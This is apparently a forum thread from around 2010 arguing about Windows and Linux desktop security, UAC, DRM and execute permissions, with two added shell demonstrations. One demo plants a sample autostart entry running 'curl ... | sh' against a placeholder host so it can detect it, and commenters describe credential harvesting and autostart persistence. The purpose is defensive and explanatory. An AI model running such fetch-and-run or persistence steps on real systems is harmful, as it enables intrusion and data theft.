You have too much faith in the average user, if you think they'll configure and admin a whole PC instead of just buying a small appliance and forgetting that it's even there. And if you actually want them to configure and admin it _well_, now that's a whole other issue.
There are ways to make systems more secure, starting with strong containment.
There is a better way: to know the source of the programs you are running. To be able to evaluate how they work and rely on a vast community to openly discuss and fix errors.
Linux is obviously better than Windows, but even Windows users can enjoy better security by using open source for code that requires broad file/network privileges (such as a web browser) and then contain code that doesn't.
Awesome idea!
Security Free Day!
Educate them by giving them an annual example of *why* security is necessary.
Everyone backs up on the third Friday of August, and then drop the walls/encryption/anti-malware Saturday morning and let it go wild.
Sadly, I honestly think that it would be about as havoc-wreaking as Y2K was. In other words, very little.
Every home router ships with a button that generates an OTP on a small display. I'm guessing a lot of these routers are owned because of weak passwords.
The main difference is cultural and longstanding.
Unixen are in the habit of granting the least amount of privilege necessary and sandboxing regular users. This goes way back into the depths of time where the OS was intended to service more than one end user and tried to keep any single user from running amok and "bringing the entire network down".
The problem with Microsoft isn't so much that their OS is crap but that their single user Commodore 64 approach to the system means their apps are crap. They make stupid engineering decisions allegedly for the sake of "easy" and then miss being easy.
It all boils down to the fact that running random binaries from untrusted sources should be hard and there should be a nice thick line separating programs and data.
Most people don't want or need a scripting language masquerading as a word processor format.
"run this" types of "malware" will always plague systems that allow end users to run anything though.
I've been running for 15 years now without any anti-virus software or anti-malware at all and have never had a single security problem. Wait, I see the issue. Apparently, how secure a desktop is depends on the desktop software. Who knew?
I don't think it's quite as you describe.
Your argument makes sense in a highly abstract, academic universe in which all people are perfectly skilled, knowledgeable and well resourced. This is too far removed from reality to be useful.
The first problem is that we know it's possible to build DRM that is extremely hard to crack. The PS3 is a working example of that. Games distributed via Xbox Live (versus dvd) are another example. These systems have been partially defeated a handful of times and then promptly re-secured. It turns out that though you technically speaking "have the keys" they are buried under so much silicon wizardry that in practice you don't have them.
The second is that it's very questionable whether there is any such thing as a "completely secure system" as you describe. Your phrasing is vague so I'll assume you're talking about resistance against attackers who are physically remote. The trend has been that over time, bugs that were once thought to be un-exploitable have become exploitable. For instance at one time both heap and integer overflows were not deemed to be a security issue until techniques for reliably exploiting them were published. Likewise, it's only recently that implementors of software cryptography have started thinking about statistical side-channel attacks and many (most?) engineers are still unfamiliar with them.
In short, it's possible to build both very strong DRM and very strong security against remote attackers, but real people routinely build very weak versions of both and I am skeptical there are any perfectly undefeatable systems out there.
HP Labs had some interesting experiments with CapDesk and Polaris trying to put some capability-based security features on top of Windows. I see three main objections to capability-based OSes:
o Picking the right set of capabilities to enforce is a tough problem that would probably require years of trial and error. For example, "open a network port" is way too broad.
o SELinux is an example of confining processes to particular kinds of access to particular objects. Defining SELinux policies has proven difficult in practice and the results are brittle.
o Nobody, to my knowledge, has demonstrated a practical one.
Test it for yourself. Write a script on a Linux machine and try to execute it without adding execute permissions. You can't do it.
$ echo 'whoami' > test.sh
$ sh test.sh
themoof
$
Just sayin....
So I have had occasion to think sort of weak thoughts about this. Yah, it seems reasonable to think everything is compromised. Personally, I have had owned wifi routers and satellite modems. I tried OpenBSD for a desktop. My firewall has been OpenBSD for a decade. So what am I using now: stupid Win XP. Ah well, at least it supports Flash and the audio works. And it is easy to reinstall every time it gets infected enough to be noticeable. I figure I should try PC-BSD. Why not? Because if you look broadly enough, who has physical security?
However, I might like a box with some limited vetted software (sort of a joke) and hardware it takes a big crowbar to get to. Can it run random stuff or even take software updates? Nah. if it costs like a netbook, get a new one every year.
Or if someone has managed to trick iexplore.exe into executing hostile code.
But that'd never happen.
DRM: Terminator crops for your mind!
So you change the umask and then every new file is executable by default. The parent talks about changing settings in Windows to bypass security, you can do the same with your example in Linux.
Mainly because the current crop of Linux users are nerds. If the example Clueless family in my example exercised that level of caution, well, they wouldn't be clueless in the first place.
And if they were that cautious, they wouldn't get pwned in Windows either. I mean, it's not like that spyware crap was linked to from microsoft.com or anything.
The way they get pwned is more like:
Joe Clueless wakes up on a Saturday morning, scratches his balls and goes to see if he has any email. Does he want herbal Viagra? Hmm, Jane has been faking too many headaches lately, maybe it couldn't hurt to at least look at the site. Just in case. Big fake UI popup tells him that he has 200 viruses on his system and needs to download and install the free Pwnage antivirus. Eeep, he doesn't want no nasty viruses on the computer he does his banking on, so let's hurry and do just that.
Next email tells him that the USPS couldn't deliver some package, and he has to run some attached executable to find out more details. Fuck, he wouldn't want to miss a package, so he dutifully does that.
Another email tells him that the IRS wants something from him, so he does that again.
Next email tells him that hundreds of naked teenage babes are waiting for him at some .ru site. Well, Jane is out with the kid, maybe he has time to take a peek. Oh, he has to install this free dialer to see the pics. Well, sure, why not? He does that.
After clicking a bit around, another popup tells him that his computer has incriminating evidence against him and he needs to download and run this amazing browser history eraser. Teh oops. Jane might be pissed off if she sees porn sites in the browser history. Time to download and run this trojan too. He makes a mental note to complain about these browser devs who don't include that function already ;)
Meanwhile Jane comes back and wants to see which of her friends emailed her. That computer gets to add a cutesy minigame from an attachment, and another handy-dandy utility to remember her passwords, to its growing malware collection. While she's at it, she clicks on the www.i-pwn-u.ru link in another email to confirm her Paypal password again. She makes a mental note to whine about these idiots at Paypal who forget her password every other day and keep asking her to enter it again ;)
Little Timmy gets his computer time in the afternoon and gets his ass handed to him in multiplayer again. He googles for "counterstrike cheats" (or whatever game he's playing) and gets to some dodgy site where if you just download their keyboard and mouse driver, it can do a whole collection of FPS macros for you and make you play like a pro. (And also log the keypresses and send them back home, but they're not saying that.) Bweh-heh-heh, he'll show those guys in his clan who's teh uber-l337 FPS player.
Do you see any reason why in the same scenario they'd exercise caution about what they download in Linux, when they don't in Windows?
Remember when people used to laugh when the subject of hardware infection came up?
Let's mark the date - May 2010, now can we move on to securing our hardware [without draconian measures].
If we're able to get the HW manufacturers on board we might see something of a victory in the near future and be able to compute without interference.
This problem has never been taken seriously - and it's about time.
Subversionhack:
http://subversionhack.livejournal.com/
~hylas
Maybe in the past, but there are a lot of cases where DRM is still standing tough:
HD Satellite
PS3 -- one guy finally found one crack, but Sony has already not just patched this (and patched out Linux support in general), but put code in so they can force ROM upgrades as they see fit.
Zune WMA DRM. No, transcoding or analog hole doesn't count.
Blu-Ray -- AACS/BD+/BD-ROM mark. Still nothing even close to a break.
HDCP -- those cables are still secure. No such thing as a box you plug your HDMI cable into to decode stuff like you could with the old Macrovision VHS copy-protection.
Windows/Office activation. Yes, a crack may exist, but it gets flushed out every Patch Tuesday. Plus, I've yet to see a crack for Windows that is not a Trojan in disguise.
VAC/Warden bypass tools. The only utility that actually works with a game is MQ2 for EverQuest. Every other utility either results in a ban, or is a Trojan.
So, newer forms of DRM which bring in autoupdate mechanisms are winning the war.
Why don't you learn to read instead of thinking you're too cute for it, smackoff.
Oh, you're just adorable yourself getting all pissy like that! :-)
And for the record I really am just too cute for it. Cute Overload actually rejected me saying even they could not handle my cuteness. I am all that cute *and* a bag of chips.
Smackoff? That's a new one. Even Urban Dictionary provided no illumination. Hmm. A wrestling term perhaps? Is it the groovy new lingo kids are throwing down these days at the soda shoppe?
I don't generally post this kind of thing, but please mod the parent up. I cannot stress enough how false assumptions are generally bad in terms of security. Yes, Linux is being attacked (successfully), as is Mac OSX. The attacks on home routers are particularly heinous as most people do not update/upgrade the firmware ever, and more of it is based on common Linux underpinnings.
Michael J. Ryan - tracker1.info
Not quite. Windows *ASSUMES* executable status based on the *EXTENSION* of a file. You can't execute a .TXT file, but rename it to .EXE and it will try to run it. The problem is the association of .EXEs with a loader or something like that. It's a legacy system predating NTFS, going back to DOS days. And you can't really fix .EXEs by removing that association or nothing will run (including failed boot). That was the case at least the last time I checked it.
Tying executable and readable flags on NTFS together is an afterthought to make this extension association for .exe work. Microsoft tries to avoid executing software downloaded off of the network by flagging these files, but that is not an ideal solution.
On Linux, the problem is not quite like on Windows but it is somewhat similar too. It is true that you cannot execute a downloaded executable without setting it +x (you can though, if the user sets their umask :). But you sure can get a default program to open it. If there is a bug in the default association (e.g. a .deb file, or some compressed file opened by archive software), then it is just as trivial to get remote code execution. So yes, you can't execute by extension, but you can still get remote code execution by exploiting a known vulnerability in a default application that opens a given mime type/file type.
There's another difference, and it's a doozy:
Once the user starts to suspect shenanigans, cleaning you out is as simple as (optionally) rescuing important user data, killing the user account, and rolling up a new one. Getting back to 'trustworthy system' is a lot simpler and more foolproof if you're confident that the hostile code was effectively contained by its user privs.
Of course, this isn't a dealbreaker: as you said, you can get plenty of evil done by just hanging out in the unprivileged account, and all bets are off if there are any local escalation exploits, which there pretty much always are. But ignoring these kinds of exploits, in principle, user privilege management is sufficient to keep the underlying system trustworthy, even if it can't protect the individual users from themselves.
> UAC is light years ahead of the competition when it comes to being a nuisance.
UAC is no more of a nuisance than gksudo or whatever mechanism OSX uses to elevate privileges.
> You're an idiot for even bringing it up.
Do you have an actual argument, or are you just having a bad day?
I don't always use unix-like operating systems; but when I do, I prefer FreeBSD.
If a hostile piece of code is able to create such a script in the first place, it is almost certainly also able to execute 'chmod' without asking you.
Collecting some ideas in this thread how about this. Not as a perfect solution, there isn't one, but it might cut zombies down greatly.
- Home routers by default are protected by a security company or the isp, automatically patched or re-imaged.
- A similar strategy is used to create a secure pc used only in the home for financial transactions.
- The router is used as a bidirectional filter, to keep the network clean (not letting zombies from inside the house get out) and to keep the pcs in the house clean (not letting dangerous looking things get through any ports, including scary looking email). So the router has to communicate proactively with the user and we need some standard client apps for that perhaps.
- Users are given an intrusion detection agent to run on their router (well the router downloads it automatically) and optionally on pcs/macs/linuxes that will detect port scans, attempts to break in via password scanning ftp and ssh services, and all known malware attacks. This will report to the ISP which can block those attackers from entering the ISP's network, or if inside the network then flag for examination. For example when I got my Mac a year ago I had to install things like fail2ban and this sort of thing is beyond the knowledge or understanding of most users.
- ISPs provide a way (manual entry via a website, and also via a standardized webservice that third party developers can target) for end-users to report IPs that are attempting attacks. The ISP can ban IPs outside the network that rack up a number of such attempts.
- There is a big danger of the ISP taking advantage of this power, and there need to be rules that ISPs can't do that. There is a big danger that by closing lots of ports it could break the net for protocols used by new applications, video conferencing, etc.
- Users therefore would be able to select among various providers of filters, allowing the market competition to reward the best providers, independent of the ISPs. No filtering at all (with all done by user) must be an option.
- Getting ISPs and third party providers of security profiles and security agents to work together and agree on standards is difficult. It could be assisted by a homeland security czar but the government would be too likely to abuse such a position, sneaking in security policies in lieu of court cases or legislation. So probably security consulting companies and manufacturers should discuss this at industry events and make an online venue to thrash out the ideas. Ideally users would pick the ISP with the best security record but apparently there is not enough competition in that market yet.
- Also ideally, statistics on attacks, infections and performance of the system as a whole would also be retrievable via webservices by third parties, in other words the entire system from device to end user to router to isp to corporate systems would form an interlocking, ad-hoc instrumented security system that is transparent enough to understand what is going on and what works, what doesn't.
- There is still the danger of unknown vulnerabilities, so there will need to be a big batch of canaries sprinkled about to try and detect them. Perhaps some of these things are already in place through actions of antivirus manufacturers and isps.
Unfortunately, what was a good part of town yesterday may be a bad one today. These changes happen relatively slowly in meatspace, but can happen more or less instantly in cyberspace. It's just not possible to ever be sure where the bad parts of town are. You could work on a whitelist of only trusted sites, but you'd end up blocking 95% of the Internet, most of which is harmless.
The main problem here is that the Internet is only MOSTLY harmless.
Mal-2
How is the Riemann zeta function like Trump rallies? Both have an endless number of trivial zeros.
You can install standalone debs and rpms, and they can have viruses. Will they get executable rights by default? (I'm on windows now.)
You lock up a tank by locking all the hatches internally but one, then putting an exterior padlock on that.
*picks up bic pen*
*walks toward nearest army base with M1 Abrams*
*Whistles to allay suspicion*
HA! I just wasted some of your bandwidth with a frivolous sig!
Simply telling people when they have an unusual mail load would probably do wonders to help.
Telling them when their traffic looks like a bot has taken it.
Getting them to go to gmail would help.
I have never had a virus I didn't put there on my PC. My family follows the simple directions for email and applications.
It's nice to see kids learning about this in schools now. Safe ways to use the computer will also go a long way to stop this.
It's really common sense stuff to reduce the risk. Looking for a solution that's a 100% fix will only cause snake oil salesmen to push placebos and get us nowhere.
The Kruger Dunning explains most post on
DRM can always be defeated because the "attacker" is exactly the same as the user, and you're already giving them everything they need. That is a system which is fundamentally flawed. Real security is where you don't give the attacker your keys, passwords, etc.
So DRM relies on "security through obscurity", which is generally frowned on in security circles.
I'm drawing a distinction between the attackers, who most people assume are people anyway, and the classic case of PEBKAC. I can protect myself reasonably well from attackers, including human ones. I can't reasonably protect you from anyone if you're not willing to cooperate.
Don't thank God, thank a doctor!
HUH?
There is a fundamental difference where Windows fails and Unix works.
As a user you NEVER HAVE TO GIVE THEM ROOT ACCESS. Ever! I can as a user install software, make changes, Hell, I can change Xorg settings and never touch /etc; if I blow the hell out of things I only blow the hell out of it for me.
Windows? I have to write to that abortion called the registry that is in the system folder. Oops, install software? I need to write to system and system32. Look, I got me an open door into the system...
Honestly, it's utter retardation that Windows works the way it does. There should NEVER be a reason to write to the OS files. Put software DLL files in /program files/system, put software settings in a separate registry. NOTHING should be able to go into /windows for any reason unless it's an OS update or a driver update and only done via Administrator.
Do not look at laser with remaining good eye.
> There are several ways to make online banking completely secure.
Sorry, but you just lost all credibility right here. Anyone who claims that anything can be "completely secure" is either a) trying to sell something or b) clueless. You can say something is "more secure" or that something provides better security, but nothing, ever, will be "completely secure".
The
I don't see how it's much more difficult to get someone to download a .deb or .rpm file and install it versus getting them to download an .exe and install it. You're trying to create a distinction where none exists, and that gives people a false sense of security when running Linux.
Don't take life so seriously. No one makes it out alive.
As the CTO of a company named 'WhiteHat Security' you are, and I'm being mild here, completely unqualified for your job if you're just now learning to make that assumption. You do not belong in any group, conversation, publication, organization or even organizational unit that involves security. You are ignorant of the most basic premises of security.
Now ... to put it bluntly, you fucking suck at your job.
Anyone with half a clue assumes the client is compromised and has for as long as I can remember.
Persistent Volume manager for Kubernetes - https://github.com/dwimsey/openshift-pvmanager
However, if you assume that your client's machine is infected, no measure will secure your transaction. (There are keyloggers which do screenshots on mouse clicks etc.)
> Just sayin....
You're executing sh, not the script. While I agree that pedantically speaking that does show the original poster was incorrect, it's at least violating the spirit of the challenge.
If malware is spreading due to idiots receiving emails saying 'Hey Bob, download pwned.sh and then run 'sudo sh pwned.sh'' then the malware authors might as well just ask those people to mail them their bank passwords because they're dumb enough to do so.
I know this is a little FUD, but not exactly implausible. -Jeremiah Grossman
> If a hostile piece of code is able to create such a script in the first place, it is almost certainly also able to execute 'chmod' without asking you.
Not when it's using a driveby download exploit like the ones that hit Safari in recent years; there's a huge difference between being able to download a non-executable pwned.sh to your Downloads directory and being able to execute it there... even if the user clicks on it, it won't run if it doesn't have execute permission.
The only ways to get a file executed on your PC which don't also require the user to manually add execute permission are through browser exploits, in which case you're already inside a process the user is running and they're owned anyway.
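An added shell demonstration of the execute-bit behaviour argued over in this sub-thread (the "sh test.sh" post, the umask reply, and the chmod remark); it is not code from any poster. It assumes a POSIX sh with mktemp and works only inside a throwaway temporary directory, showing that a file written without a mode change is refused by direct execution, still runs when handed to an interpreter, cannot be made executable by umask alone, and only runs directly after an explicit chmod +x.

```shell
#!/bin/sh
# Added example, not from the thread: what the Unix execute bit does and does
# not control. Assumes a POSIX sh and mktemp; everything happens in a temp dir.

# Writes a script the way a download or redirect would (no mode change) and
# reports four checks on one line:
#   direct=<denied|ok>  running the file by path with no x bit
#   viash=<ok|fail>     running the same file as "sh test.sh"
#   umask0=<nox|x>      whether umask 000 makes a new file executable
#   chmod=<ok|fail>     whether chmod +x then lets the file run by path
exec_bit_demo() {
    dir=$(mktemp -d) || return 1
    script="$dir/test.sh"

    # A redirect creates the file with mode 0666 & ~umask. The x bits are
    # never requested, so the kernel will not set them for a plain write.
    printf '#!/bin/sh\necho hello\n' > "$script"

    # Direct execution goes through execve(), which requires an x bit.
    if "$script" >/dev/null 2>&1; then direct=ok; else direct=denied; fi

    # An interpreter only needs read permission: this is the poster's "sh test.sh".
    if out=$(sh "$script" 2>/dev/null) && [ "$out" = hello ]; then viash=ok; else viash=fail; fi

    # umask only clears bits. Even 000 leaves a fresh file at 0666, with no x.
    (umask 000; printf 'echo hi\n' > "$dir/loose.sh")
    if [ -x "$dir/loose.sh" ]; then umask0=x; else umask0=nox; fi

    # Only an explicit mode change by the owner makes direct execution work
    # (this last check also depends on the temp dir not being mounted noexec).
    chmod +x "$script"
    if out=$("$script" 2>/dev/null) && [ "$out" = hello ]; then chmod=ok; else chmod=fail; fi

    rm -rf "$dir"
    printf '%s %s %s %s\n' "direct=$direct" "viash=$viash" "umask0=$umask0" "chmod=$chmod"
}

exec_bit_demo
```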
It is not only file permissions. Windows software has the habit of embedding executable code in everything, text files (even the ones you can't edit), images, movies, everything. Also Windows (and the accompanying software) keeps putting dialog boxes in the face of its users, and expects them to be able to discern when one of those dialogs is important to read; people simply can't do that.
That said, Windows is also easier to own without user intervention. It has more important open bugs all the time and has almost no variation within its installed base.
Rethinking email
> Your argument makes sense in a highly abstract, academic universe in which all people are perfectly skilled, knowledgeable and well resourced.
I also addressed a universe in which people are reasonably skilled, knowledgeable, and well-resourced. I think that's a definite possibility. I hate to use a car analogy, but no one expects driving a car to be "easy" or "intuitive" or something you should be able to just pick up and do instantly. They expect to have to learn something. It only takes the tiniest bit of that kind of attitude to increase desktop security dramatically.
Really, it's not difficult to keep your system patched and avoid downloading random crap. 99% of the population can't seem to do that, I grant you, but it's not that far removed from reality.
The first problem is that we know it's possible to build DRM that is extremely hard to crack.
It only has to be cracked once -- particularly software DRM. One person (or team) figures out how to crack it, and distributes that over the Internet.
These systems have been partially defeated a handful of times and then promptly re-secured. It turns out that though you technically speaking "have the keys" they are buried under so much silicon wizardry that in practice you don't have them.
"Promptly re-secured" suggests that it's not the silicon alone.
I could also qualify this with, all DRM is theoretically crackable, and all DRM involving static media (audio and video) will be cracked, as we've seen. Executable stuff (games) is harder.
The second is that it's very questionable whether there is any such thing as a "completely secure system" as you describe. Your phrasing is vague so I'll assume you're talking about resistance against attackers who are physically remote.
Yes.
The trend has been that over time, bugs that were once thought to be un-exploitable have become exploitable.
We're talking about bugs, though. You're going to find this even more ludicrous, but there is nothing inherent in software that requires it to have bugs. The bugs are our fault.
Now, I'm not going to tell you that I can create flawless software, or that any human can, only that it's possible, whereas working DRM is not.
For instance at one time both heap and integer overflows were not deemed to be a security issue until techniques for reliably exploiting them were published.
And both heap and integer overflows are things which do not have to exist.
Likewise, it's only recently that implementors of software cryptography have started thinking about statistical side-channel attacks and many (most?) engineers are still unfamiliar with them.
This is harder, yes. However, these are mostly dealing with information sent over the wire, and none of it applies to keeping a single desktop PC secure, given that desktop PCs typically don't need remote access.
I am skeptical there are any perfectly undefeatable systems out there.
As am I.
However, to take "DRM can never work", and use that to conclude that "Security is impossible", is missing the point. It's a bit like noticing that homeopathy is bunk, and from that, concluding that medicine is impossible.
Don't thank God, thank a doctor!
And you sir, don't understand that the executable bit can be worked around ... pretty much instantly, with a basic shell script ... which itself doesn't have or need the executable bit.
Good job for thinking you have a clue, but I'll run any binary on your system in a heartbeat that I have a +r on regardless of its +x status.
let me give you a simple starting point, just paste this into your shell prompt as is ...
Persistent Volume manager for Kubernetes - https://github.com/dwimsey/openshift-pvmanager
ugh, nice mangling slashdot ... it didn't look screwed up when I previewed it ...
echo '#!/bin/sh' > test.sh
echo "echo Hello, I'm an idiot who really doesn't understand file permissions" >> test.sh
If Linux had the market share of Windows, it would have as much, or nearly as much, malware.
Seriously, can we put this to rest? Compare the number of Linux servers and Windows servers on the web and tell me again that that argument holds water.
Who cares if you're not running as root if everything interesting is owned by the user's account?
If that were the case, you would be correct. Unfortunately, it isn't, and you aren't. When malware installed on a Windows machine can write to the registry and to DLL's in C:\Windows\system32, it becomes very, very difficult to remove such malware. By contrast, the one and only time I ever needed to clean up a compromised Linux machine, it was a simple matter of changing an Internet user's password (to fix the initial exploit -- a weak, compromised password) and deleting a copy of PHPShell that the hacker had uploaded into the compromised user's public_html directory. Since neither the compromised user account nor the web server daemon had write access to anything outside of /home/username or /var/www (i.e., binaries or libraries), it was orders of magnitude easier to clean up this particular Linux machine than any Windows machine I've ever had to disinfect.
If you can lock down a Windows box and keep it clean, more power to you. I have yet to see a Windows machine stay clean indefinitely, however, no matter how conscientious or skilled the admin. To be honest, whether Linux is inherently more secure (which I think it is) or is more secure simply because, as you say, Windows is more common and therefore, it is less profitable to write malware for Linux, I really don't care. What I know is my Linux boxes don't see the same kind of exploits Windows boxes regularly do, and until they do, I'll stick with Linux.
MCSE? No, sir...I don't do Windows. Yes, I am an idealist. What's your point?
So you want the Nannystate to fix this for you because you're too lazy to fix this yourself? Collectivist! We don't need your fascist-socialism here! Leave America if you hate it so much! [/sarcasm]
Actually, I'm a liberal, although in this case, I don't think we need any draconian laws or oversized bureaucracies to deal with this issue. Why? Because even though it would cost ISPs money to address this issue, infected computers on their network costs them money in the form of more traffic (they gotta pay for the pipes to the backbone after all). They therefore have a financial motive for dealing with their customers' infected computers, and some ISPs have in fact taken it upon themselves to warn users that they suspect have compromised computers. All on their own.
So I think it would only take a little nudge from the government to encourage the other ISPs to start doing something similar. Just stress to them that the extra traffic from infected computers is probably costing them money.
I'm with you here, except for this bit:
...even if the user clicks on it, it won't run if it doesn't have execute permission.
'Even if?' If these drive-by download exploits are only able to create pwned.sh, then I'm not sure what they could ever accomplish if the user didn't click.
If this exploit could instead be used to create a pwned.sh with the execute bit already set, could we then get that script to run without user help? Or are we still stuck waiting around for a curious moron to click it?
DRM: Terminator crops for your mind!
I understood your distinction. My response to you was tongue-in-cheek.
"while democracy seeks equality in liberty, socialism seeks equality in restraint and servitude." de Tocqueville
Oh, and look how fantastical I am at HTML.
Yes, and the grandparent's post was bogus or at least dated. A lot of severe malware tends to take advantage of bugs in programs like web browsers, PDF readers, or even native APIs like the GDI exploits a couple of years ago. You don't need execute permissions, you just need to trick the user into opening the file (for reading) with an exploitable program.
As somewhat mentioned, the only real defense is something like SELinux (or AppArmor) and they are a pain to configure - far too much of a pain for most casual users.
(Program: Firefox was recently installed, please specify the directories and ports it is allowed to access)
You put an executable on a Windows system and it's immediately executable by anyone.
So can you in Linux, that's what "chmod +x" is for. And even when you use a noexec mount (which no desktop distro I know does), people can still just use one of the dozens of scripting languages that you find on every random Linux out there.
The only security advantage Linux has over Windows is that on Linux (or at least the major distros) you have a central repository of all software. On Windows you don't. So on Windows even something as simple as searching for a driver leads you across a ton of dubious webpages whose authority you cannot verify, while on Linux stuff just works with what comes from the repository.
Of course every now and then you might not find what you are searching for in a repository, but these days that doesn't happen all too often; my /usr/local/ has been virtually empty for years.
The whole idea behind the first post is a false sense of security because, by default, umask doesn't include the execute permissions. If I'm an attacker and already have managed to write to your filesystem as you, it'd be trivial for me to chmod +x my malicious file using utilities I can already execute, or even just run the commands without using a file. For example, I could run perl -e 'creatively packed malicious code' and be on my way.
Of course, I've been operating under the assumption that the attacker is creating and trying to run the file. Odds are, if the user downloaded and tried to execute the file, the lack of a default execute privilege isn't going to mysteriously save them. They're just going to run 'chmod +x SuparCoolCalendar' and run it again. Or, if it's a shell script, they're just going to do the same thing I did to run it without execute permissions if they're too lazy to chmod.
The point is, if the user is trying to execute something, they're going to execute it regardless of what your umask is set to.
many organizations, particularly in the financial services industry, have gotten to the point of assuming that their customers' desktops are compromised
Isn't that a good thing? If I were writing code that interacts with a system outside my control, I would assume the worst case scenario (compromised, packet sniffers, rootkits, etc.) and code as much as I can to be resilient to that.
Have financial institutions been running thus far under the assumption that their customer's computers aren't compromised?
Faith is a willingness to accept something w/o complete proof and to act on it. Reason allows you to correct that faith.
Ummm...the Internet is the bad part of town. Your Intranet is the only network you can really trust (and TFA puts doubt on that, even).
Just sayin'...
The main problem is twofold. The software companies (i.e. all of them) have their own agenda: profit. Microsoft is probably the biggest culprit, but they are also the largest targeted OS. The second part is the consequences. If laws started making it very painful to be caught performing 'internet terrorism' then you would see a large fall in these types of crimes. Utilizing acids, a propane torch and a pair of vice grips would solve the problem overnight.
Umm... No. That doesn't work on Debian.
garyk@lappy:~/scripts$ echo #!/bin/bash >test2.sh
garyk@lappy:~/scripts$ echo whoami >> test2.sh
garyk@lappy:~/scripts$ test2.sh
bash: /home/garyk/scripts/test2.sh: Permission denied
garyk@lappy:~/scripts$ chmod +x test2.sh
garyk@lappy:~/scripts$ test2.sh
I can't help it that whatever distro you're running has bypassed basic Linux security decisions, but the distro I use has not.
You don't need gksudo unless you're actually doing something "administrative" like changing system-wide settings or installing system-wide software.
No non-administrative app should ever require root, so if you didn't do something where you would otherwise expect to need gksudo you can just assume the prompt is fake.
The reason UAC needs to be so clever is that day to day tasks often cause it to activate and you need to be able to tell the difference.
Oops. I cut off the output from whoami after giving test2.sh execute permissions, but it did run then.
And seatbelts don't save your life in every situation, so nobody should wear them.
It is difficult to get a man to understand something when his job depends on not understanding it.
It's not about profit, it's that windows gives people administrator by default (and you can still enable it in Windows 7).
It is now two major Windows releases since the standard user was Administrator - and even in prior versions it was only true of Windows machines not joined to a Domain.
On top of that, typical malware does not need elevated privileges to do its work.
iexplore.exe is asking for administrator access. grant forever/don't ask again? Way to go, giving viruses admin access. It happens all the time.
IE rarely asks for elevated privileges (can't even remember the last time I saw it). There is no option to "grant forever" in UAC.
The rest of the security is no different in most scenarios whether windows or linux. However, on this front, UAC doesn't do squat (especially when you can get around UAC).
UAC does the same thing gksudo in Linux distros do.
Once the user starts to suspect shenanigans, cleaning you out is as simple as (optionally) rescuing important user data, killing the user account, and rolling up a new one. Getting back to 'trustworthy system' is a lot simpler and more foolproof if you're confident that the hostile code was effectively contained by its user privs.
Which you never can be.
Otherwise, the user himself must add the execute permission to the file.
Users are happy to open password-protected zipfiles to get at the dancing bunnies inside. Are you seriously try to suggest "chmod +x boobies.sh", or "perl bunnies.pl" is some sort of meaningful security barrier ?
Test it for yourself. Write a script on a Linux machine and try to execute it without adding execute permissions. You can't do it. Try that on Windows and it works. No changes necessary. That's a huge difference in security.
No. It's insignificant and irrelevant.
We're number one! Windows is number 1.25! SUCK IT BALLMER!
You can rag on Windows and admin privileges all you want. All I can say is:
login as: root
root@yourhost.foo's password:*******
Spare me the, "OMG USE SUDOZ LOLZ" because that's a load of crap in the face of the poor argument that 'UAC' not doing squat.
As for the rest, go deal with commodity hosting sometime. The number of infected Linux systems out there is legion. And it'll continue to be so, because in the end, Linux has the same problem as Windows: Package management sucks. It doesn't matter what distribution you choose, sooner or later, users will need to install something that's a) not in their distribution's package management system or b) is included but horribly out of date or simply broken.
When that happens, they're going to scream, curse, drink heavily, install the package the old fashioned way (probably involving several megatons of mail to mailing lists/posts to forums to figure out how) and then, once it's working - promptly forget about it. It will then be left to rot, and any security patches/etc. coming out for $SOFTWARE will be ignored.
The differences in how to gain administrator access do affect up front security requirements.
You're missing the point -- administrator access isn't needed to compromise a system. If I can harvest someone's saved credit card data from ~/.mozilla or %PROFILE%\ApplicationData\mozilla, and while I'm there drop a script into ~/.kde/autostart or %PROFILE%...\StartMenu\Startup , why do I need root? Privileged permissions certainly let you extend the damage you're capable of -- but *any* access at all is the only requirement for compromising a system.
iexplore.exe is asking for administrator access. grant forever/don't ask again? Way to go, giving viruses admin access. It happens all the time.
Konqueror is requesting admin permissions. Please enter your password. Way to go, giving worms and spyware admin access. This isn't a platform issue - the underlying model (from the user perspective) is the same: Trivial, everyday activities cause the user to be inundated with confirmation requests. The user gets trained to accept them without thinking -- whether it be by clicking a button or entering a password. So when it matters, they're *still* going to give permission.
Maybe both systems need to take a closer look at what they're doing. Windows prompts you for installing new programs, for accessing certain folders in Explorer, and various other pointless things that you do in the normal course of interacting with your computer. Ubuntu does the exact same thing - except the range of things it prompts for is even bigger. Changing network settings. Configuring hardware. Installing security updates (unless that's changed in 10.04 - I'm still on 9.10). All of these things that you won't ever say no to, because you initiate them in the first place.
When presented with an obstacle such as a prompt, most users don't read it. They take whatever action is the quickest one to take in order to make it go away. The answer to this is not to put more prompts up -- because if you *do* have a scenario in which Something Bad is going to happen, the user is well-trained to just keep plowing through it.
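An added example, not the poster's code: the per-user persistence locations named above, ~/.kde/autostart (plus the older ~/.kde/Autostart and the freedesktop ~/.config/autostart, which the comment does not mention), enumerated the way an incident responder would check a suspect account before deciding whether "kill the account and roll a new one" is enough. It runs against a constructed throwaway home directory holding one .desktop launcher and one raw script; the Exec command lines in it are made up for the demo. Pass a real home directory to list_user_autostart to audit a live account.

```shell
#!/bin/sh
# Added example, not the poster's code: enumerate per-user autostart
# locations that need no root to write to. Sample entries are constructed.

# Print "path<TAB>command" for every entry in the user-level autostart
# directories of HOME. .desktop launchers are reduced to their Exec= line;
# anything else is shown with its first line so an odd file stands out.
list_user_autostart() {
    home=$1
    for d in "$home/.config/autostart" "$home/.kde/Autostart" "$home/.kde/autostart"; do
        [ -d "$d" ] || continue
        for f in "$d"/*; do
            [ -f "$f" ] || continue
            case "$f" in
                *.desktop) cmd=$(sed -n 's/^Exec=//p' "$f" | head -n 1) ;;
                *)         cmd="(raw file) $(head -n 1 "$f")" ;;
            esac
            printf '%s\t%s\n' "$f" "$cmd"
        done
    done
}

# Build a throwaway home with one launcher and one script (both constructed
# for the demo), audit it, and clean up.
demo_autostart_audit() {
    home=$(mktemp -d)
    mkdir -p "$home/.config/autostart" "$home/.kde/autostart"
    printf '%s\n' '[Desktop Entry]' 'Type=Application' 'Name=Update Helper' \
        'Exec=sh -c "curl -s http://example.invalid/p | sh"' \
        > "$home/.config/autostart/update.desktop"
    printf '%s\n' '#!/bin/sh' 'exec sh "$HOME/.cache/.p"' \
        > "$home/.kde/autostart/sync.sh"
    report=$(list_user_autostart "$home")
    rm -rf "$home"
    printf '%s\n' "$report"
}

demo_autostart_audit
```

Nothing here needs root, which is the point of the comment: everything the attacker wrote and everything this finds lives under the user's own account. The Windows equivalents the poster names (the per-user Startup folder and the HKCU Run keys) are the same idea with different paths.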
as a user you NEVER HAVE TO GIVE THEM ROOT ACCESS. Ever!
